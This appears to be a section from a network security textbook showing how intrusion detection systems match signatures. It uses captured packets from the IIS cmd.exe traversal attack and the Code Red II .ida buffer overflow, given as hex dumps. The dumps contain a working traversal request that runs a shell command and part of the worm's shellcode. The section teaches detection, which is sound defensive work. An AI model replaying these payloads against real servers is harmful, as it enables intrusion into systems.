Previous Section  < Day Day Up >  Next Section

NIDS Signature Examples

An NIDS operates by examining packets and comparing them to known signatures. A good example of a common attack that can be clearly identified by its signature is the cmd.exe attack that is used against the Internet Information Server (IIS), which is Microsoft's Web server. This attack is used by Internet worms and viruses such as Nimda and Code Red. In this case, the worm or human attacker attempts to execute a copy of cmd.exe, which is the Windows command line binary, in a writable directory using a buffer overflow in the IIS Web server module called Internet Server API (ISAPI). If successful, then the hacker or worm has access to a command line on that machine and can wreak considerable havoc. However, the command to copy this file is obvious; there is no reason for legitimate users to be executing this file over the network via IIS. So if you see this activity, then it's a good bet that it is an intrusion attempt. By examining the packet payload and searching for the words cmd.exe, an NIDS can identify this kind of attack. Listing 7.1 shows one of these packets. The hexadecimal contents are on the left and the ASCII translation is on the right.

Listing 7.1. The cmd.exe Execution Packet

length = 55



000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /

  scripts/..%

010 : 35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../

  winnt/sy

020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/

  cmd.exe?/

030 : 63 2B 64 69 72 0D 0A               c+dir..


Another attack that is easy to identify by its signature is the .ida buffer overflow. The Code Red worm propagated using this method. It utilized a buffer overflow in the .ida extension for Microsoft's IIS Web server. This extension is installed by default but is often not needed. If you don't install the patch for this condition, it can allow direct access to your machine. Fortunately, an NIDS can quickly identify these packets by matching the GET /default.ida statement contained in them. You can see a partial listing of an .ida attack in Listing 7.2. This particular one also has the words Code Red II in it, which means it was generated by a Code Red worm trying to infect this machine. Even if your machines are fully patched and immune to these kinds of attacks, it is good to know where they are coming from and at what frequency.

Listing 7.2. Signature of an .ida Attack

length = 1414



000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /

  default.ida

010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  ?XXXXXXXXXXXXXXX

020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58

  XXXXXXXXXXXXXXXX

0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63

  X%u9090%u6858%uc

100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25

  bd3%u7801%u9090%

110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30

  u6858%ucbd3%u780

120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63

  1%u9090%u6858%uc

130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25

  bd3%u7801%u9090%

140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63

  u9090%u8190%u00c

150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35

  3%u0003%u8b00%u5

160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25

  31b%u53ff%u0078%

170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54

  u0000%u00=a HTT

180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/

  1.0..Content-t

190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/

  xml.Co

1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33

  ntent-length: 33

1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79

  ........'....

1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00

  ....dg.6..dg.&..

1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF

  .....h......\...

1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40

  P.U...\...P.U..@

1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00

  .....X....U.=...

200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6

  ....=...........

210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00

  ...T....u..~0...

220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A

  ........F0......

230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24

  ...CodeRedII...$


    Previous Section  < Day Day Up >  Next Section